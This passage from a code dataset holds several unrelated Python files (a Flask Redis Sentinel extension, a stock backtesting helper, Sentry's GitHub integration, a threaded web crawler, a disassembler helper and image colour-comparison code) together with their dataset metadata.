lessons_id\n\n for i in range(len(self.lessons_id)):\n link_element = self.driver.find_element_by_id(self.lessons_id[i])\n link_element.click()\n \n close_element = WebDriverWait(self.driver,10).until(\n EC.element_to_be_clickable(\n (By.CSS_SELECTOR, 'button[class=\"mfp-close\"]'))\n )\n close_element.click()\n","sub_path":"Reservation/reservation_manager.py","file_name":"reservation_manager.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162196176","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: e:\\opt\\private\\cw1427\\fab-admin\\fab_admin\\fab_manager_overwrite\\flask_redis_sentinel.py\n# Compiled at: 2020-02-11 09:22:57\n# Size of source mod 2**32: 7008 bytes\nimport six, inspect, redis, redis.sentinel, redis_sentinel_url\nfrom flask import current_app\nfrom werkzeug.local import Local, LocalProxy\nfrom werkzeug.utils import import_string\nimport logging\nlog = logging.getLogger(__name__)\n_EXTENSION_KEY = 'redissentinel'\n\nclass RedisSentinelInstance(object):\n\n def __init__(self, url, client_class, client_options, sentinel_class, sentinel_options):\n self.url = url\n self.client_class = client_class\n self.client_options = client_options\n self.sentinel_class = sentinel_class\n self.sentinel_options = sentinel_options\n self.local = Local()\n self._connect()\n if self.local.connection[0] is None:\n self.connection = self.local.connection\n self.local = self\n\n def _connect(self):\n try:\n return self.local.connection\n except AttributeError:\n conn = redis_sentinel_url.connect((self.url),\n sentinel_class=(self.sentinel_class),\n sentinel_options=(self.sentinel_options),\n client_class=(self.client_class),\n client_options=(self.client_options))\n self.local.connection = conn\n return conn\n\n @property\n def sentinel(self):\n return self._connect()[0]\n\n @property\n def default_connection(self):\n return self._connect()[1]\n\n def master_for(self, service_name, **kwargs):\n try:\n return self.local.master_connections[service_name]\n except AttributeError:\n self.local.master_connections = {}\n except KeyError:\n pass\n\n sentinel = self.sentinel\n if sentinel is None:\n msg = 'Cannot get master {} using non-sentinel configuration'\n raise RuntimeError(msg.format(service_name))\n conn = (sentinel.master_for)(service_name, redis_class=self.client_class, **kwargs)\n self.local.master_connections[service_name] = conn\n return conn\n\n def slave_for(self, service_name, **kwargs):\n try:\n return self.local.slave_connections[service_name]\n except AttributeError:\n self.local.slave_connections = {}\n except KeyError:\n pass\n\n sentinel = self.sentinel\n if sentinel is None:\n msg = 'Cannot get slave {} using non-sentinel configuration'\n raise RuntimeError(msg.format(service_name))\n conn = (sentinel.slave_for)(service_name, redis_class=self.client_class, **kwargs)\n self.local.slave_connections[service_name] = conn\n return conn\n\n\nclass RedisSentinel(object):\n __doc__ = 'Flask extension that supports connections to master using Redis Sentinel.\\n\\n Supported URL types:\\n redis+sentinel://\\n redis://\\n rediss://\\n unix://\\n '\n\n def __init__(self, app=None, config_prefix='REDIS', client_class=None, sentinel_class=None):\n self.config_prefix = config_prefix\n self.client_class = client_class\n self.sentinel_class = sentinel_class\n if app is not None:\n self.init_app(app)\n self.sentinel = LocalProxy(lambda : self.get_instance().sentinel)\n self.default_connection = LocalProxy(lambda : self.get_instance().default_connection)\n\n def init_app(self, app, config_prefix=None, client_class=None, sentinel_class=None):\n config_prefix = config_prefix or self.config_prefix\n app.config.setdefault(config_prefix + '_' + 'URL', 'redis://localhost/0')\n config = self._strip_dict_prefix(app.config, config_prefix + '_')\n extensions = app.extensions.setdefault(_EXTENSION_KEY, {})\n if config_prefix in extensions:\n msg = 'Redis sentinel extension with config prefix {} is already registered'\n raise RuntimeError(msg.format(config_prefix))\n client_class = self._resolve_class(config, 'CLASS', 'client_class', client_class, redis.StrictRedis)\n sentinel_class = self._resolve_class(config, 'SENTINEL_CLASS', 'sentinel_class', sentinel_class, redis.sentinel.Sentinel)\n url = config.pop('URL')\n client_options = self._config_from_variables(config, client_class)\n sentinel_options = self._config_from_variables(self._strip_dict_prefix(config, 'SENTINEL_'), client_class)\n extensions[config_prefix] = RedisSentinelInstance(url, client_class, client_options, sentinel_class, sentinel_options)\n self.config_prefix = config_prefix\n\n def _resolve_class(self, config, config_key, attr, the_class, default_class):\n if the_class is None:\n the_class = getattr(self, attr)\n if the_class is None:\n the_class = config.get(config_key, default_class)\n if isinstance(the_class, six.string_types):\n the_class = import_string(the_class)\n config.pop(config_key, None)\n return the_class\n\n @staticmethod\n def _strip_dict_prefix(orig, prefix):\n return {k[len(prefix):]:v for k, v in six.iteritems(orig) if k.startswith(prefix)}\n\n @staticmethod\n def _config_from_variables(config, the_class):\n args = inspect.getargspec(the_class.__init__).args\n base_args = inspect.getargspec(redis.client.Redis.__init__).args\n args.extend(base_args)\n args.remove('self')\n args.remove('host')\n args.remove('port')\n args.remove('db')\n return {arg:config[arg.upper()] for arg in args if arg.upper() in config}\n\n def get_instance(self):\n app = current_app._get_current_object()\n if _EXTENSION_KEY not in app.extensions or self.config_prefix not in app.extensions[_EXTENSION_KEY]:\n msg = 'Redis sentinel extension with config prefix {} was not initialized for application {}'\n raise RuntimeError(msg.format(self.config_prefix, app.import_name))\n return app.extensions[_EXTENSION_KEY][self.config_prefix]\n\n def master_for(self, service_name, **kwargs):\n return LocalProxy(lambda : (self.get_instance().master_for)(service_name, **kwargs))\n\n def slave_for(self, service_name, **kwargs):\n return LocalProxy(lambda : (self.get_instance().slave_for)(service_name, **kwargs))\n\n\nSentinelExtension = RedisSentinel","sub_path":"pycfiles/fab-admin-0.1.5.tar/flask_redis_sentinel.cpython-36.py","file_name":"flask_redis_sentinel.cpython-36.py","file_ext":"py","file_size_in_byte":6556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"294510118","text":"import pandas as pd\nimport numpy as np\n\nfrom pyfolio import timeseries\nimport pyfolio\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom copy import deepcopy\n\nimport yfinance as yf\n\n\nclass YahooDownloader:\n \"\"\"Provides methods for retrieving daily stock data from\n Yahoo Finance API\n\n Attributes\n ----------\n start_date : str\n start date of the data (modified from config.py)\n end_date : str\n end date of the data (modified from config.py)\n ticker_list : list\n a list of stock tickers (modified from config.py)\n\n Methods\n -------\n fetch_data()\n Fetches data from yahoo API\n\n \"\"\"\n\n def __init__(self, start_date: str, end_date: str, ticker_list: list):\n\n self.start_date = start_date\n self.end_date = end_date\n self.ticker_list = ticker_list\n\n def fetch_data(self) -> pd.DataFrame:\n \"\"\"Fetches data from Yahoo API\n Parameters\n ----------\n\n Returns\n -------\n `pd.DataFrame`\n 7 columns: A date, open, high, low, close, volume and tick symbol\n for the specified stock ticker\n \"\"\"\n # Download and save the data in a pandas DataFrame:\n data_df = pd.DataFrame()\n for tic in self.ticker_list:\n temp_df = yf.download(tic, start=self.start_date, end=self.end_date)\n temp_df[\"tic\"] = tic\n data_df = data_df.append(temp_df)\n # reset the index, we want to use numbers as index instead of dates\n data_df = data_df.reset_index()\n try:\n # convert the column names to standardized names\n data_df.columns = [\n \"date\",\n \"open\",\n \"high\",\n \"low\",\n \"close\",\n \"adjcp\",\n \"volume\",\n \"tic\",\n ]\n # use adjusted close price instead of close price\n data_df[\"close\"] = data_df[\"adjcp\"]\n # drop the adjusted close price column\n data_df = data_df.drop(\"adjcp\", 1)\n except NotImplementedError:\n print(\"the features are not supported currently\")\n # create day of the week column (monday = 0)\n data_df[\"day\"] = data_df[\"date\"].dt.dayofweek\n # convert date to standard string format, easy to filter\n data_df[\"date\"] = data_df.date.apply(lambda x: x.strftime(\"%Y-%m-%d\"))\n # drop missing data\n data_df = data_df.dropna()\n data_df = data_df.reset_index(drop=True)\n print(\"Shape of DataFrame: \", data_df.shape)\n # print(\"Display DataFrame: \", data_df.head())\n\n data_df = data_df.sort_values(by=['date','tic']).reset_index(drop=True)\n\n return data_df\n\n def select_equal_rows_stock(self, df):\n df_check = df.tic.value_counts()\n df_check = pd.DataFrame(df_check).reset_index()\n df_check.columns = [\"tic\", \"counts\"]\n mean_df = df_check.counts.mean()\n equal_list = list(df.tic.value_counts() >= mean_df)\n names = df.tic.value_counts().index\n select_stocks_list = list(names[equal_list])\n df = df[df.tic.isin(select_stocks_list)]\n return df\n\n\n\n\ndef get_daily_return(df, value_col_name=\"account_value\"):\n df = deepcopy(df)\n df[\"daily_return\"] = df[value_col_name].pct_change(1)\n df[\"date\"] = pd.to_datetime(df[\"date\"])\n df.set_index(\"date\", inplace=True, drop=True)\n df.index = df.index.tz_localize(\"UTC\")\n return pd.Series(df[\"daily_return\"], index=df.index)\n\ndef convert_daily_return_to_pyfolio_ts(df):\n strategy_ret= df.copy()\n strategy_ret['date'] = pd.to_datetime(strategy_ret['date'])\n strategy_ret.set_index('date', drop = False, inplace = True)\n strategy_ret.index = strategy_ret.index.tz_localize('UTC')\n del strategy_ret['date']\n ts = pd.Series(strategy_ret['daily_return'].values, index=strategy_ret.index)\n return ts\n\ndef backtest_stats(account_value, value_col_name=\"account_value\"):\n dr_test = get_daily_return(account_value, value_col_name=value_col_name)\n perf_stats_all = timeseries.perf_stats(\n returns=dr_test,\n positions=None,\n transactions=None,\n turnover_denom=\"AGB\",\n )\n print(perf_stats_all)\n return perf_stats_all\n\n\ndef backtest_plot(\n account_value,\n baseline_start,\n baseline_end,\n baseline_ticker=\"^DJI\",\n value_col_name=\"account_value\",\n):\n\n df = deepcopy(account_value)\n test_returns = get_daily_return(df, value_col_name=value_col_name)\n\n baseline_df = get_baseline(\n ticker=baseline_ticker, start=baseline_start, end=baseline_end\n )\n\n baseline_returns = get_daily_return(baseline_df, value_col_name=\"close\")\n with pyfolio.plotting.plotting_context(font_scale=1.1):\n pyfolio.create_full_tear_sheet(\n returns=test_returns, benchmark_rets=baseline_returns, set_context=False\n )\n\n\ndef get_baseline(ticker, start, end):\n dji = YahooDownloader(\n start_date=start, end_date=end, ticker_list=[ticker]\n ).fetch_data()\n return dji\n\n\ndef trx_plot(df_trade,df_actions,ticker_list): \n df_trx = pd.DataFrame(np.array(df_actions['transactions'].to_list()))\n df_trx.columns = ticker_list\n df_trx.index = df_actions['date']\n df_trx.index.name = ''\n \n for i in range(df_trx.shape[1]):\n df_trx_temp = df_trx.iloc[:,i]\n df_trx_temp_sign = np.sign(df_trx_temp)\n buying_signal = df_trx_temp_sign.apply(lambda x: True if x>0 else False)\n selling_signal = df_trx_temp_sign.apply(lambda x: True if x<0 else False)\n \n tic_plot = df_trade[(df_trade['tic']==df_trx_temp.name) & (df_trade['date'].isin(df_trx.index))]['close']\n tic_plot.index = df_trx_temp.index\n\n plt.figure(figsize = (10, 8))\n plt.plot(tic_plot, color='g', lw=2.)\n plt.plot(tic_plot, '^', markersize=10, color='m', label = 'buying signal', markevery = buying_signal)\n plt.plot(tic_plot, 'v', markersize=10, color='k', label = 'selling signal', markevery = selling_signal)\n plt.title(f\"{df_trx_temp.name} Num Transactions: {len(buying_signal[buying_signal==True]) + len(selling_signal[selling_signal==True])}\")\n plt.legend()\n plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=25)) \n plt.xticks(rotation=45, ha='right')\n plt.show()\n","sub_path":"backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81930122","text":"from __future__ import absolute_import\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom sentry import http, options\nfrom sentry.identity.pipeline import IdentityProviderPipeline\nfrom sentry.identity.github import get_user_info\nfrom sentry.integrations import (\n IntegrationInstallation, IntegrationFeatures, IntegrationProvider,\n IntegrationMetadata, FeatureDescription,\n)\nfrom sentry.integrations.exceptions import ApiError\nfrom sentry.integrations.constants import ERR_INTERNAL, ERR_UNAUTHORIZED\nfrom sentry.integrations.repositories import RepositoryMixin\nfrom sentry.models import Repository\nfrom sentry.pipeline import NestedPipelineView, PipelineView\nfrom sentry.tasks.integrations import migrate_repo\nfrom sentry.utils.http import absolute_uri\n\nfrom .client import GitHubAppsClient\nfrom .issues import GitHubIssueBasic\nfrom .repository import GitHubRepositoryProvider\nfrom .utils import get_jwt\n\n\nDESCRIPTION = \"\"\"\nConnect your Sentry organization into your GitHub organization or user account.\nTake a step towards augmenting your sentry issues with commits from your\nrepositories ([using releases](https://docs.sentry.io/learn/releases/)) and\nlinking up your GitHub issues and pull requests directly to issues in Sentry.\n\"\"\"\n\nFEATURES = [\n FeatureDescription(\n \"\"\"\n Create and link Sentry issue groups directly to a GitHub issue or pull\n request in any of your repositories, providing a quick way to jump from\n Sentry bug to tracked issue or PR!\n \"\"\",\n IntegrationFeatures.ISSUE_BASIC,\n ),\n FeatureDescription(\n \"\"\"\n Authorize repositories to be added to your Sentry organization to augmenting\n sentry issues with commit data with [deployment\n tracking](https://docs.sentry.io/learn/releases/).\n \"\"\",\n IntegrationFeatures.COMMITS,\n ),\n]\n\ndisable_dialog = {\n 'actionText': 'Visit GitHub',\n 'body': 'Before deleting this integration, you must uninstall this'\n ' integration from GitHub. After uninstalling, your integration will'\n ' be disabled at which point you can choose to delete this'\n ' integration.',\n}\n\nremoval_dialog = {\n 'actionText': 'Delete',\n 'body': 'Deleting this integration will delete all associated repositories'\n ' and commit data. This action cannot be undone. Are you sure you'\n ' want to delete your integration?',\n}\n\nmetadata = IntegrationMetadata(\n description=DESCRIPTION.strip(),\n features=FEATURES,\n author='The Sentry Team',\n noun=_('Installation'),\n issue_url='https://github.com/getsentry/sentry/issues/new?title=GitHub%20Integration:%20&labels=Component%3A%20Integrations',\n source_url='https://github.com/getsentry/sentry/tree/master/src/sentry/integrations/github',\n aspects={\n 'disable_dialog': disable_dialog,\n 'removal_dialog': removal_dialog,\n },\n)\n\nAPI_ERRORS = {\n 404: 'GitHub returned a 404 Not Found error. If this repository exists, ensure'\n ' that your installation has permission to access this repository'\n ' (https://github.com/settings/installations).',\n 401: ERR_UNAUTHORIZED,\n}\n\n\ndef build_repository_query(metadata, name, query):\n account_type = 'user' if metadata['account_type'] == 'User' else 'org'\n return (u'%s:%s %s' % (account_type, name, query)).encode('utf-8')\n\n\nclass GitHubIntegration(IntegrationInstallation, GitHubIssueBasic, RepositoryMixin):\n repo_search = True\n\n def get_client(self):\n return GitHubAppsClient(integration=self.model)\n\n def get_repositories(self, query=None):\n if not query:\n return [{\n 'name': i['name'],\n 'identifier': i['full_name']\n } for i in self.get_client().get_repositories()]\n\n full_query = build_repository_query(self.model.metadata, self.model.name, query)\n response = self.get_client().search_repositories(full_query)\n return [{\n 'name': i['name'],\n 'identifier': i['full_name']\n } for i in response.get('items', [])]\n\n def search_issues(self, query):\n return self.get_client().search_issues(query)\n\n def get_unmigratable_repositories(self):\n accessible_repos = self.get_repositories()\n accessible_repo_names = [r['identifier'] for r in accessible_repos]\n\n existing_repos = Repository.objects.filter(\n organization_id=self.organization_id,\n provider='github',\n )\n\n return filter(\n lambda repo: repo.name not in accessible_repo_names,\n existing_repos,\n )\n\n def reinstall(self):\n self.reinstall_repositories()\n\n def message_from_error(self, exc):\n if isinstance(exc, ApiError):\n message = API_ERRORS.get(exc.code)\n if message:\n return message\n return (\n 'Error Communicating with GitHub (HTTP %s): %s' % (\n exc.code, exc.json.get('message', 'unknown error')\n if exc.json else 'unknown error',\n )\n )\n else:\n return ERR_INTERNAL\n\n def has_repo_access(self, repo):\n client = self.get_client()\n try:\n # make sure installation has access to this specific repo\n # use hooks endpoint since we explicity ask for those permissions\n # when installing the app (commits can be accessed for public repos)\n # https://developer.github.com/v3/repos/hooks/#list-hooks\n client.repo_hooks(repo.config['name'])\n except ApiError:\n return False\n return True\n\n\nclass GitHubIntegrationProvider(IntegrationProvider):\n key = 'github'\n name = 'GitHub'\n metadata = metadata\n integration_cls = GitHubIntegration\n features = frozenset([\n IntegrationFeatures.COMMITS,\n IntegrationFeatures.ISSUE_BASIC,\n ])\n\n can_disable = True\n\n setup_dialog_config = {\n 'width': 1030,\n 'height': 1000,\n }\n\n def post_install(self, integration, organization):\n repo_ids = Repository.objects.filter(\n organization_id=organization.id,\n provider__in=['github', 'integrations:github'],\n integration_id__isnull=True,\n ).values_list('id', flat=True)\n\n for repo_id in repo_ids:\n migrate_repo.apply_async(kwargs={\n 'repo_id': repo_id,\n 'integration_id': integration.id,\n 'organization_id': organization.id,\n })\n\n def get_pipeline_views(self):\n identity_pipeline_config = {\n 'oauth_scopes': (),\n 'redirect_url': absolute_uri('/extensions/github/setup/'),\n }\n\n identity_pipeline_view = NestedPipelineView(\n bind_key='identity',\n provider_key='github',\n pipeline_cls=IdentityProviderPipeline,\n config=identity_pipeline_config,\n )\n\n return [GitHubInstallationRedirect(), identity_pipeline_view]\n\n def get_installation_info(self, access_token, installation_id):\n session = http.build_session()\n resp = session.get(\n 'https://api.github.com/app/installations/%s' % installation_id,\n headers={\n 'Authorization': 'Bearer %s' % get_jwt(),\n 'Accept': 'application/vnd.github.machine-man-preview+json',\n }\n )\n resp.raise_for_status()\n installation_resp = resp.json()\n\n resp = session.get(\n 'https://api.github.com/user/installations',\n params={'access_token': access_token},\n headers={'Accept': 'application/vnd.github.machine-man-preview+json'}\n )\n resp.raise_for_status()\n user_installations_resp = resp.json()\n\n # verify that user actually has access to the installation\n for installation in user_installations_resp['installations']:\n if installation['id'] == installation_resp['id']:\n return installation_resp\n\n return None\n\n def build_integration(self, state):\n identity = state['identity']['data']\n\n user = get_user_info(identity['access_token'])\n installation = self.get_installation_info(\n identity['access_token'], state['installation_id'])\n\n integration = {\n 'name': installation['account']['login'],\n # TODO(adhiraj): This should be a constant representing the entire github cloud.\n 'external_id': installation['id'],\n # GitHub identity is associated directly to the application, *not*\n # to the installation itself.\n 'idp_external_id': installation['app_id'],\n 'metadata': {\n # The access token will be populated upon API usage\n 'access_token': None,\n 'expires_at': None,\n 'icon': installation['account']['avatar_url'],\n 'domain_name': installation['account']['html_url'].replace('https://', ''),\n 'account_type': installation['account']['type'],\n },\n 'user_identity': {\n 'type': 'github',\n 'external_id': user['id'],\n 'scopes': [], # GitHub apps do not have user scopes\n 'data': {'access_token': identity['access_token']},\n },\n }\n\n if state.get('reinstall_id'):\n integration['reinstall_id'] = state['reinstall_id']\n\n return integration\n\n def setup(self):\n from sentry.plugins import bindings\n bindings.add(\n 'integration-repository.provider',\n GitHubRepositoryProvider,\n id='integrations:github',\n )\n\n\nclass GitHubInstallationRedirect(PipelineView):\n def get_app_url(self):\n name = options.get('github-app.name')\n return 'https://github.com/apps/%s' % name\n\n def dispatch(self, request, pipeline):\n if 'reinstall_id' in request.GET:\n pipeline.bind_state('reinstall_id', request.GET['reinstall_id'])\n\n if 'installation_id' in request.GET:\n pipeline.bind_state('installation_id', request.GET['installation_id'])\n return pipeline.next_step()\n\n return self.redirect(self.get_app_url())\n","sub_path":"src/sentry/integrations/github/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":10321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"327030498","text":"N = int(input())\n\nresult = input()\nred = [1, 2, 3, 4, 5] * N\nblue = [5, 4, 3, 2, 1] * N\nyellow = [3] * N\n\nscore = {\n 'red': 0,\n 'blue': 0,\n 'yellow': 0\n}\nfor i in range(N):\n prob = int(result[i])\n if prob == red[i]:\n score['red'] += 1\n if prob == blue[i]:\n score['blue'] += 1\n if prob == yellow[i]:\n score['yellow'] += 1\n\nmax_correct = max(score.values())\nprint(max_correct)\nfor student in [k for k, v in score.items() if v == max_correct]:\n print(student)","sub_path":"3주차/이상민/[브루트포스]시험.py","file_name":"[브루트포스]시험.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"18593155","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /home/aitjcize/Work/creepy/creepy/crawler.py\n# Compiled at: 2016-04-24 02:58:44\nfrom __future__ import print_function\nimport os, re, sys\nfrom threading import Thread, Lock\nif sys.version_info < (3, 0):\n import httplib\n from urllib import quote\nelse:\n import http.client as httlib\n from urllib.parse import quote\n\nclass Document(object):\n\n def __init__(self, res, url):\n self.url = url\n self.query = '' if '?' not in url else url.split('?')[(-1)]\n self.status = res.status\n self.text = res.read()\n self.headers = dict(res.getheaders())\n if sys.version_info >= (3, 0):\n self.text = self.text.decode()\n\n\nclass Crawler(object):\n F_ANY, F_SAME_DOMAIN, F_SAME_HOST, F_SAME_PATH = list(range(4))\n\n def __init__(self):\n self.host = None\n self.visited = {}\n self.targets = set()\n self.threads = []\n self.concurrency = 0\n self.max_outstanding = 16\n self.max_depth = 0\n self.include_hashtag = False\n self.follow_mode = self.F_SAME_HOST\n self.content_type_filter = '(text/html)'\n self.url_filters = []\n self.prefix_filter = '^(#|javascript:|mailto:)'\n self.targets_lock = Lock()\n self.concurrency_lock = Lock()\n return\n\n def set_content_type_filter(self, cf):\n self.content_type_filter = '(%s)' % ('|').join(cf)\n\n def add_url_filter(self, uf):\n self.url_filters.append(uf)\n\n def set_follow_mode(self, mode):\n if mode > 5:\n raise RuntimeError('invalid follow mode.')\n self.follow_mode = mode\n\n def set_concurrency_level(self, level):\n self.max_outstanding = level\n\n def set_max_depth(self, max_depth):\n self.max_depth = max_depth\n\n def set_include_hashtag(self, include):\n self.include_hashtag = include\n\n def process_document(self, doc):\n print('GET', doc.status, doc.url)\n\n def crawl(self, url, path=None):\n self.root_url = url\n rx = re.match('(https?://)([^/]+)([^\\\\?]*)(\\\\?.*)?', url)\n self.proto = rx.group(1)\n self.host = rx.group(2)\n self.path = rx.group(3)\n self.dir_path = os.path.dirname(self.path)\n self.query = rx.group(4)\n if path:\n self.dir_path = path\n self.targets.add(url)\n self._spawn_new_worker()\n while self.threads:\n try:\n for t in self.threads:\n t.join(1)\n if not t.isAlive():\n self.threads.remove(t)\n\n except KeyboardInterrupt:\n sys.exit(1)\n\n def _url_domain(self, host):\n parts = host.split('.')\n if len(parts) <= 2:\n return host\n else:\n if re.match('^[0-9]+(?:\\\\.[0-9]+){3}$', host):\n return host\n return ('.').join(parts[1:])\n\n def _follow_link(self, url, link):\n if re.search(self.prefix_filter, link):\n return\n else:\n for f in self.url_filters:\n if re.search(f, link):\n return\n\n if not self.include_hashtag:\n link = re.sub('(%23|#).*$', '', link)\n rx = re.match('(https?://)([^/:]+)(:[0-9]+)?([^\\\\?]*)(\\\\?.*)?', url)\n url_proto = rx.group(1)\n url_host = rx.group(2)\n url_port = rx.group(3) if rx.group(3) else ''\n url_path = rx.group(4) if len(rx.group(4)) > 0 else '/'\n url_dir_path = os.path.dirname(url_path)\n rx = re.match('((https?://)([^/:]+)(:[0-9]+)?)?([^\\\\?]*)(\\\\?.*)?', link)\n link_full_url = rx.group(1) is not None\n link_proto = rx.group(2) if rx.group(2) else url_proto\n link_host = rx.group(3) if rx.group(3) else url_host\n link_port = rx.group(4) if rx.group(4) else url_port\n link_path = quote(rx.group(5), '/%') if rx.group(5) else url_path\n link_query = quote(rx.group(6), '?=&%') if rx.group(6) else ''\n link_dir_path = os.path.dirname(link_path)\n if not link_full_url and not link.startswith('/'):\n link_path = os.path.normpath(os.path.join(url_dir_path, link_path))\n link_url = link_proto + link_host + link_port + link_path + link_query\n if self.follow_mode == self.F_ANY:\n return link_url\n if self.follow_mode == self.F_SAME_DOMAIN:\n if self._url_domain(self.host) == self._url_domain(link_host):\n return link_url\n return\n if self.follow_mode == self.F_SAME_HOST:\n if self.host == link_host:\n return link_url\n return\n if self.follow_mode == self.F_SAME_PATH:\n if self.host == link_host and link_dir_path.startswith(self.dir_path):\n return link_url\n else:\n return\n\n return\n\n def _calc_depth(self, url):\n return len(url.replace('https', 'http').replace(self.root_url, '').rstrip('/').split('/')) - 1\n\n def _add_target(self, target):\n if not target:\n return\n if self.max_depth and self._calc_depth(target) > self.max_depth:\n return\n with self.targets_lock:\n if target in self.visited:\n return\n self.targets.add(target)\n\n def _spawn_new_worker(self):\n with self.concurrency_lock:\n self.concurrency += 1\n t = Thread(target=self._worker, args=(self.concurrency,))\n t.daemon = True\n self.threads.append(t)\n t.start()\n\n def _worker(self, sid):\n while self.targets:\n try:\n with self.targets_lock:\n url = self.targets.pop()\n self.visited[url] = True\n rx = re.match('(https?)://([^/]+)(.*)', url)\n protocol = rx.group(1)\n host = rx.group(2)\n path = rx.group(3)\n if protocol == 'http':\n conn = httplib.HTTPConnection(host, timeout=10)\n else:\n conn = httplib.HTTPSConnection(host, timeout=10)\n conn.request('GET', path)\n res = conn.getresponse()\n if res.status == 404:\n continue\n if res.status == 301 or res.status == 302:\n rlink = self._follow_link(url, res.getheader('location'))\n self._add_target(rlink)\n continue\n try:\n if not re.search(self.content_type_filter, res.getheader('Content-Type')):\n continue\n except TypeError:\n continue\n\n doc = Document(res, url)\n self.process_document(doc)\n links = re.findall('href\\\\s*=\\\\s*[\\'\"]\\\\s*([^\\'\"]+)[\\'\"]', doc.text, re.S)\n links = list(set(links))\n for link in links:\n rlink = self._follow_link(url, link.strip())\n self._add_target(rlink)\n\n if self.concurrency < self.max_outstanding:\n self._spawn_new_worker()\n except KeyError:\n break\n except (httplib.HTTPException, EnvironmentError):\n with self.targets_lock:\n self.targets.add(url)\n\n with self.concurrency_lock:\n self.concurrency -= 1","sub_path":"pycfiles/creepy_crawly-0.1.0-py3-none-any/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":7735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389549113","text":"from struct import *\nfrom GlobalModel import GlobalModel as gm\nfrom Utils import *\nfrom mnemonic.Mnemonic import Mnemonic\n\nclass Sub(Mnemonic):\n\n @staticmethod\n def execute(pc, text, mnemonic):\n\n if mnemonic == 0x812e: # sub [1234], #1234\n addr, = unpack('<H', text[2:4])\n val, = unpack('<H', text[4:6])\n Sub.printInst(pc, convNum(text, 6), '['+hex(addr)+']', val)\n pcInc = 6\n elif mnemonic == 0x802e: # sub byte [1234], #12\n addr, = unpack('<H', text[2:4])\n val, = unpack('<B', text[4])\n Sub.printInst(pc, convNum(text, 5), '['+hex(addr)+']', val)\n pcInc = 5\n else:\n raise Exception(\"unknown register name specified\")\n\n return pcInc\n \n @staticmethod\n def printInst(pc, raw, target, val):\n inst = 'sub %s, %04x' % (target, val)\n printInst(pc, raw, inst)\n\n","sub_path":"v6-86/tutorial/work8/7run/mnemonic/reverse/Sub.py","file_name":"Sub.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"609468821","text":"\r\nimport sys\r\nimport math\r\n\r\n\r\n# returns Boolean, Boolean, brightness value\r\n# first boolean is color change\r\n# second boolean is within brightness threshold value\r\n# third value is actual brightness change value\r\ndef compute_appearance_difference(orig_pix, comp_pix, brit_thres, clr_thres=None, get_values=None):\r\n\r\n if not clr_thres:\r\n color_ch_threshold = 10\r\n else:\r\n color_ch_threshold = clr_thres\r\n \r\n if type(orig_pix) is dict and type(comp_pix) is dict:\r\n red_difference = orig_pix['r'] - comp_pix['r']\r\n green_difference = orig_pix['g'] - comp_pix['g']\r\n blue_difference = orig_pix['b'] - comp_pix['b']\r\n \r\n elif type(orig_pix) is tuple and type(comp_pix) is tuple:\r\n red_difference = orig_pix[0] - comp_pix[0]\r\n green_difference = orig_pix[1] - comp_pix[1]\r\n blue_difference = orig_pix[2] - comp_pix[2] \r\n\r\n \r\n if red_difference >= 0:\r\n if green_difference >= 0:\r\n rg_diff = abs( red_difference - green_difference )\r\n else:\r\n # red_difference is 0 or positive, green_difference is negative\r\n rg_diff = abs(green_difference) + red_difference\r\n \r\n if blue_difference >= 0:\r\n # red_difference is 0 or positive, blue_difference is also 0 or positive\r\n rb_diff = abs( red_difference - blue_difference )\r\n else:\r\n # red_difference is 0 or positive, blue_difference is negative\r\n rb_diff = abs(blue_difference) + red_difference\r\n else:\r\n if green_difference >= 0:\r\n # red_difference is negative and green_difference is 0 or positive\r\n rg_diff = abs(red_difference) + green_difference\r\n else:\r\n # red_difference is negative and green_difference is negative\r\n rg_diff = abs( red_difference - green_difference )\r\n \r\n if blue_difference >= 0:\r\n # red_difference is negative and blue_difference is 0 or positive\r\n rb_diff = abs(red_difference) + blue_difference\r\n else:\r\n # red_difference is negative and blue_difference is negative\r\n rb_diff = abs( red_difference - blue_difference )\r\n \r\n \r\n if green_difference >= 0:\r\n if blue_difference >= 0:\r\n gb_diff = abs( green_difference - blue_difference )\r\n else:\r\n # green_difference is 0 or positive and blue_difference is negative\r\n gb_diff = abs(blue_difference) + green_difference\r\n else:\r\n if blue_difference >= 0: \r\n # green_difference is negative and blue_difference is 0 or positive\r\n gb_diff = abs(green_difference) + blue_difference\r\n else:\r\n # green_difference is negative and blue_difference is negative\r\n gb_diff = abs( green_difference - blue_difference )\r\n\r\n \r\n clr_change = rg_diff + rb_diff + gb_diff\r\n\r\n \r\n # this should be applied only if color change did not happen. average brightness change\r\n average_britch = ( abs(red_difference) + abs(green_difference) + abs(blue_difference) ) / 3 \r\n \r\n if get_values:\r\n return clr_change, average_britch\r\n \r\n if clr_change <= color_ch_threshold :\r\n if average_britch <= brit_thres:\r\n # color stayed and brightness is within threshold value\r\n return False, True, average_britch\r\n else:\r\n # color stayed but not within threshold value\r\n return False, False, average_britch\r\n \r\n\r\n # color changed\r\n return True, None, None\r\n\r\n\r\n\r\n\r\n# in parameters\r\n# param_pixel -> string\r\n# image size contains width and height\r\n# returns list of 